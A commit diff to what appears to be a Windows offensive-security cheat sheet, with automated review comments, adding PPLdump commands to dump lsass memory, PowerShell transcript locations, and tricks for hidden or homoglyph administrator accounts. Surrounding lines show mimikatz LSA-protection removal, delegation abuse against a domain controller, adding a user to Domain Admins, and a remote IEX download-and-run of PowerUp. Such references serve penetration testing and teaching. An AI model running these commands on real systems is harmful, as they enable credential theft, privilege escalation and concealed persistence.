PS Transcript + PPLdump.exe
parent
28a48bd696
commit
a723a34449
@ -2153,10 +2153,10 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
|||||||
```ps1
|
```ps1
|
||||||
# alternative
|
# alternative
|
||||||
$SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid
|
$SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid
|
||||||
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer M3DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
|
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
|
||||||
|
|
||||||
# alternative
|
# alternative
|
||||||
StandIn_Net35.exe --computer m3dc --sid SID_FROM_PREVIOUS_COMMAND
|
StandIn_Net35.exe --computer dc01 --sid SID_FROM_PREVIOUS_COMMAND
|
||||||
```
|
```
|
||||||
|
|
||||||
5. Use Rubeus to get hash from password
|
5. Use Rubeus to get hash from password
|
||||||
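Review bot: The target in the PowerView and StandIn lines is now a concrete-looking hostname (`Get-DomainComputer DC01`, `--computer dc01`) while the same fence marks its other substitution points with the `MACHINE_ACCOUNT_NAME` / `SID_FROM_PREVIOUS_COMMAND` convention, so a reader may not notice that DC01 is also a value to replace. One style for all three would make that obvious, e.g. `Get-DomainComputer TARGET_COMPUTER | Set-DomainObject -Set @{...}` and `--computer TARGET_COMPUTER --sid SID_FROM_PREVIOUS_COMMAND`. The numbered step list this fence belongs to starts before the hunk.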
|
@ -64,7 +64,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
|||||||
|
|
||||||
## Mimikatz - LSA Protection Workaround
|
## Mimikatz - LSA Protection Workaround
|
||||||
|
|
||||||
- LSA as a Protected Process
|
- LSA as a Protected Process (RunAsPPL)
|
||||||
```powershell
|
```powershell
|
||||||
# Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
|
# Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
|
||||||
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
|
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
|
||||||
@ -83,9 +83,15 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
|||||||
|
|
||||||
# Now lets re-add the protection flags to the lsass.exe process
|
# Now lets re-add the protection flags to the lsass.exe process
|
||||||
mimikatz # !processprotect /process:lsass.exe
|
mimikatz # !processprotect /process:lsass.exe
|
||||||
|
|
||||||
# Unload the service created
|
# Unload the service created
|
||||||
mimikatz # !-
|
mimikatz # !-
|
||||||
|
|
||||||
|
|
||||||
|
# https://github.com/itm4n/PPLdump
|
||||||
|
PPLdump.exe [-v] [-d] [-f] <PROC_NAME|PROC_ID> <DUMP_FILE>
|
||||||
|
PPLdump.exe lsass.exe lsass.dmp
|
||||||
|
PPLdump.exe -v 720 out.dmp
|
||||||
```
|
```
|
||||||
|
|
||||||
- LSA is running as virtualized process (LSAISO) by **Credential Guard**
|
- LSA is running as virtualized process (LSAISO) by **Credential Guard**
|
||||||
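Review bot: The PPLdump lines are appended inside the mimikatz fence directly after the `!-` driver-unload command, with a bare URL as the only introduction, so the page does not say what the tool is or when it applies. A one-line comment before the usage line would fix that, e.g. `# PPLdump: user-mode alternative to the mimikatz driver for the same task; check the project README for the Windows builds it still works on`. As far as I recall the project's README itself states that the technique it relies on was addressed by a 2022 Windows update, so a caveat that it is expected to fail on patched hosts belongs here; I have not verified the exact update, so word it as "reportedly". The `reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa` check earlier in this file could also be narrowed with `/v RunAsPPL` so only the value the comment talks about is printed.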
|
@ -21,7 +21,8 @@
|
|||||||
* [Wifi passwords](#wifi-passwords)
|
* [Wifi passwords](#wifi-passwords)
|
||||||
* [Sticky Notes passwords](#sticky-notes-passwords)
|
* [Sticky Notes passwords](#sticky-notes-passwords)
|
||||||
* [Passwords stored in services](#passwords-stored-in-services)
|
* [Passwords stored in services](#passwords-stored-in-services)
|
||||||
* [Powershell history](#powershell-history)
|
* [Powershell History](#powershell-history)
|
||||||
|
* [Powershell Transcript](#powershell-transcript)
|
||||||
* [Password in Alternate Data Stream](#password-in-alternate-data-stream)
|
* [Password in Alternate Data Stream](#password-in-alternate-data-stream)
|
||||||
* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
|
* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
|
||||||
* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
|
* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
|
||||||
@ -102,6 +103,7 @@
|
|||||||
```powershell
|
```powershell
|
||||||
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
|
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
|
||||||
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
|
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
|
||||||
|
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Report PrivescCheck_%COMPUTERNAME% -Format TXT,CSV,HTML"
|
||||||
```
|
```
|
||||||
|
|
||||||
## Windows Version and Configuration
|
## Windows Version and Configuration
|
||||||
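Review bot: The new report line uses `%COMPUTERNAME%`, which is cmd.exe syntax: it is expanded by cmd before `powershell -c` starts, so it works from the `C:\Temp\>` prompt shown but is passed literally if the same command is pasted into a PowerShell session. Either say that the three lines are meant for cmd.exe, or use the PowerShell form inside the quoted string, `-Report PrivescCheck_$env:COMPUTERNAME -Format TXT,CSV,HTML`. A short sentence that `-Report` writes the findings to files on the host, and that those files are sensitive output, would also help readers.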
@ -537,7 +539,7 @@ Invoke-SessionGopher -AllDomain -o
|
|||||||
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
||||||
```
|
```
|
||||||
|
|
||||||
### Powershell history
|
### Powershell History
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
||||||
@ -547,6 +549,13 @@ cat (Get-PSReadlineOption).HistorySavePath
|
|||||||
cat (Get-PSReadlineOption).HistorySavePath | sls passw
|
cat (Get-PSReadlineOption).HistorySavePath | sls passw
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Powershell Transcript
|
||||||
|
|
||||||
|
```xml
|
||||||
|
C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
|
||||||
|
C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
|
||||||
|
```
|
||||||
|
|
||||||
### Password in Alternate Data Stream
|
### Password in Alternate Data Stream
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
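Review bot: The new Transcript fence is tagged `xml` although it contains two file paths, so the highlighting is misleading; `text`, or the `powershell` tag the neighbouring fences use, fits better. The two paths are listed without saying why there are two; as far as I remember, the first is the default per-user location and the second is the layout used when a transcript output directory has been configured by policy, with PowerShell creating the date subfolder, so one sentence above the fence stating that would help. The section also lacks its purpose statement, e.g. `Transcripts record every command and its output, so they may contain credentials typed at the prompt.` — which is also why the transcript directory should have restricted ACLs.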
@ -556,62 +565,55 @@ PS > Get-Content -path flag.txt -Stream Flag
|
|||||||
|
|
||||||
## EoP - Processes Enumeration and Tasks
|
## EoP - Processes Enumeration and Tasks
|
||||||
|
|
||||||
What processes are running?
|
* What processes are running?
|
||||||
|
```powershell
|
||||||
|
tasklist /v
|
||||||
|
net start
|
||||||
|
sc query
|
||||||
|
Get-Service
|
||||||
|
Get-Process
|
||||||
|
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
|
||||||
|
```
|
||||||
|
|
||||||
```powershell
|
* Which processes are running as "system"
|
||||||
tasklist /v
|
```powershell
|
||||||
net start
|
tasklist /v /fi "username eq system"
|
||||||
sc query
|
```
|
||||||
Get-Service
|
|
||||||
Get-Process
|
|
||||||
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
|
|
||||||
```
|
|
||||||
|
|
||||||
Which processes are running as "system"
|
* Do you have powershell magic?
|
||||||
|
```powershell
|
||||||
|
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
|
||||||
|
```
|
||||||
|
|
||||||
```powershell
|
* List installed programs
|
||||||
tasklist /v /fi "username eq system"
|
```powershell
|
||||||
```
|
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
|
||||||
|
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
|
||||||
|
```
|
||||||
|
|
||||||
Do you have powershell magic?
|
* List services
|
||||||
|
```powershell
|
||||||
|
net start
|
||||||
|
wmic service list brief
|
||||||
|
tasklist /SVC
|
||||||
|
```
|
||||||
|
|
||||||
```powershell
|
* Enumerate scheduled tasks
|
||||||
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
|
```powershell
|
||||||
```
|
schtasks /query /fo LIST 2>nul | findstr TaskName
|
||||||
|
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
|
||||||
|
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
||||||
|
```
|
||||||
|
|
||||||
List installed programs
|
* Startup tasks
|
||||||
|
```powershell
|
||||||
```powershell
|
wmic startup get caption,command
|
||||||
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
|
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
|
||||||
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
|
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
|
||||||
```
|
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
||||||
|
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
|
||||||
List services
|
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
|
||||||
|
```
|
||||||
```powershell
|
|
||||||
net start
|
|
||||||
wmic service list brief
|
|
||||||
tasklist /SVC
|
|
||||||
```
|
|
||||||
|
|
||||||
Scheduled tasks
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
schtasks /query /fo LIST 2>nul | findstr TaskName
|
|
||||||
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
|
|
||||||
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
|
||||||
```
|
|
||||||
|
|
||||||
Startup tasks
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
wmic startup get caption,command
|
|
||||||
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
|
|
||||||
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
|
|
||||||
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
|
||||||
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
|
|
||||||
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
|
|
||||||
```
|
|
||||||
|
|
||||||
## EoP - Incorrect permissions in services
|
## EoP - Incorrect permissions in services
|
||||||
|
|
||||||
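Review bot: The `schtasks` line in the scheduled-tasks block writes to `schtasks.txt` but then reads `schtask.txt`, so the pipeline fails as written; the line was moved rather than introduced by this commit, but the new side keeps the mismatch. Fix: `schtasks /query /fo LIST /v > schtasks.txt; cat schtasks.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM`. In the startup block, `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R` looks truncated, since the sibling lines query `...\CurrentVersion\Run`, so this is presumably meant to be `Run` as well. These blocks also mix cmd.exe syntax (`2>nul`, `%username%`, `dir`) and Unix `grep` under `powershell` fences, and the `C:\Documents and Settings\...` startup folders are the pre-Vista layout; the current equivalents are `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup` and `%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp`.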
@ -641,17 +643,16 @@ Often, services are pointing to writeable locations:
|
|||||||
```
|
```
|
||||||
|
|
||||||
- PATH directories with weak permissions
|
- PATH directories with weak permissions
|
||||||
|
```powershell
|
||||||
|
$ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
|
||||||
|
$ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
|
||||||
|
|
||||||
```powershell
|
$ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
|
||||||
$ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
|
FOR /F %i in (Servicenames.txt) DO echo %i
|
||||||
$ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
|
type Servicenames.txt
|
||||||
|
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
|
||||||
$ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
|
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
|
||||||
FOR /F %i in (Servicenames.txt) DO echo %i
|
```
|
||||||
type Servicenames.txt
|
|
||||||
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
|
|
||||||
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
|
|
||||||
```
|
|
||||||
|
|
||||||
Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions`
|
Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions`
|
||||||
|
|
||||||
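Review bot: Every line in the new `powershell` fence is cmd.exe syntax (`for /f "tokens=2 delims='='"`, `%a`, `^|` escapes, `FOR /F %i`) prefixed with a Unix-style `$ ` prompt, so neither the fence label nor the prompt matches the shell these run in, and copy-paste fails in both PowerShell and cmd. Tag the fence `bat` or `cmd` and drop the `$ ` prefixes, or add a comment that the lines are to be run from cmd.exe. A one-line comment on the intent would make the block self-explaining, e.g. `:: collect each service's binary path, then let icacls show which of those directories a low-privileged user can write to`.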
@ -769,7 +770,6 @@ gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Whe
|
|||||||
|
|
||||||
* Metasploit exploit : `exploit/windows/local/trusted_service_path`
|
* Metasploit exploit : `exploit/windows/local/trusted_service_path`
|
||||||
* PowerUp exploit
|
* PowerUp exploit
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# find the vulnerable application
|
# find the vulnerable application
|
||||||
C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
|
C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
|
||||||
@ -832,7 +832,7 @@ Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
|
|||||||
|
|
||||||
Check if these registry values are set to "1".
|
Check if these registry values are set to "1".
|
||||||
|
|
||||||
```bat
|
```powershell
|
||||||
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||||
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||||
|
|
||||||
|
@ -36,10 +36,18 @@ net group "Domain Admins" hacker /add /domain
|
|||||||
|
|
||||||
# enable a domain user account
|
# enable a domain user account
|
||||||
net user hacker /ACTIVE:YES /domain
|
net user hacker /ACTIVE:YES /domain
|
||||||
|
|
||||||
# prevent users from changing their password
|
# prevent users from changing their password
|
||||||
net user username /Passwordchg:No
|
net user username /Passwordchg:No
|
||||||
|
|
||||||
# prevent the password to expire
|
# prevent the password to expire
|
||||||
net user hacker /Expires:Never
|
net user hacker /Expires:Never
|
||||||
|
|
||||||
|
# create a machine account (not shown in net users)
|
||||||
|
net user /add evilbob$ evilpassword
|
||||||
|
|
||||||
|
# homoglyph Aԁmіnistratοr (different of Administrator)
|
||||||
|
Aԁmіnistratοr
|
||||||
```
|
```
|
||||||
|
|
||||||
Some info about your user
|
Some info about your user
|
||||||
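Review bot: The comment `# create a machine account (not shown in net users)` overstates what the line does: `net user /add evilbob$ evilpassword` creates an ordinary user account (local, since no `/domain` is given) whose name ends in `$`; as far as I remember the trailing `$` only makes the plain `net user` listing omit it, it does not create a computer object. Suggest `# create a user whose name ends in $ (omitted from the plain 'net user' listing)`. The homoglyph line `Aԁmіnistratοr` is left as a bare string with no command; say that it is a name built from non-Latin look-alike letters so it renders like `Administrator`, and fix `different of` to `different from`. A defender-facing sentence fits here too: account creations whose name contains non-ASCII characters or ends in `$` are worth alerting on for exactly these reasons.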
|